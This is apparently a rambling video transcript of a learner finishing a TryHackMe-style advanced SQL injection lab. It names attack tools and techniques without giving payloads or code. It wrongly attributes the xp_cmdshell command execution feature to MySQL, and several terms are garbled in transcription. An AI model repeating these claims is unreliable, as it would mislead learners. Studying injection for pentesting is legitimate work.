injection points, use of security measures, context specific detection. The context in which user can vary widely. Tools must adapt to different contexts and environment. A few important tools. Several renowned tools. SQL map we have done. SQL Ninja. I'll just open that in another tab. We'll see it later. JSQL injection. We need either we need one of them, or yes, we need only one of them to detect SQL injection vulnerabilities in web application. Automating the identification, progress, and exploitation of SQL injection vulnerabilities is crucial for maintaining web application security. Tools like SQL Map, SQL Ninja, SQL provide powerful capabilities for detecting exploit. These vulnerabilities, however, it's important to understand the limitations of automated tools and need for manual analysis validation. So we were doing manual analysis, I think so, because the tools like SQL map shows the vulnerability that the website contains, which vulnerability. Plus, dynamic nature of SQL queries assist in pen tester in identifying SQL injection. Dynamic SQL queries can be dynamically constructed, but it is difficult. Injection point, okay, it is difficult, then it is not easy to identify. Best practices. SQL injection is renowned and persuasive. vulnerability that has been a major concern in web application security for years. Pen tester must pay special attention on this vulnerability during their assessment, as it requires a thorough understanding of various techniques to identify the exploit. SQL injection points. Actually, SQL injection I thought was easy when I did SQL map, but it is quite a tricky topic where we can get stuck at any point. Like, a silly mistake could lead to half an hour of brainstorming also. I did that. So secure coders parameters, it is for coders. We don't need this. We need pen testers exploiting database specific vulnerability features. Different database management system has unique features and syntaxes. Pen testers should understand the specifics of database management system, MySQL, PostgreSQL, Oracle, MS SQL. To exploit these features effectively, for instance, MySQL, the XP command shell command, which can be used to execute in system commands. Okay. Exploit verbose error, leveraging error messages. We have seen how error message shows that SQL injection can be done on the site, bypassing WF filters. Database fingerprinting, determining the type of the version of the database. We have done this both tasks in the above task. Pivoting with SQL injection, we use SQL injection to pivot exploit other parts of the network. Once a database server is compromised, then it is like we can gain the access of another database through that also. Advanced SQL injection testing requires a deep understanding of various techniques and ability to adapt different environments. Pen testers should employ various methods. SQL injection and vulnerabilities like XSS also needs deep understanding of techniques and some syntax also. So what command does MySQL xp underscore command shell, I think. Yes, it is correct. Conclusion: in this room we have explored several advanced SQL injection techniques, including second order SQL injection, out of band SQL injection, and filter evasion. We also covered techniques like cookie injection. Okay, the one we did with Burfsuit was the example of cookie injection, illustrating the diverse methods attacker use exploit web application. Our journey didn't stop at exploitation. We just discussed the automation and identification of exploit injection, understanding as one technique, and understanding your ability to define vulnerabilities to understand the best practice for remediation and prevention. Armed with knowledge of this room, you better equip to protect web application, ensuring that resilient against escaping landscape of SQL injection threats. Let us know about this room, thoughts on this room on Discord or X account. Finally, I have completed this room. This was pretty easy and tough as well. I took a long to solve this room. I think I took 2.5 to 3 hours maybe. I haven't checked the recording yet because I pause the recording when I leave my desk, and I think I have took long for this. So this was it for SQL injection, advanced SQL injection actually, which was a pretty tough topic. We need active learning on that, and I'll just make a roadmap of things that relate with SQL, and in between we just discussed a thing. Let me check my Notion. I think I have written it in my notebook also. We discussed about CyberChef, but CyberChef is pretty easy. I don't know how to use in Kali Linux, but it is present on Google Chrome, and It has a very good user interface in Google Chrome, and in Kali we need to run commands different to use CyberChef, so maybe we'll not go into that. But this was it for this video, and we'll meet in another one. This time I will choose a pretty easy kind of topic. This was like tricky topic. We need to like learn this and revise our notes. I haven't like written very summarized notes, but I will write that once I have completed the room. That's it for this video. We'll meet you in the next.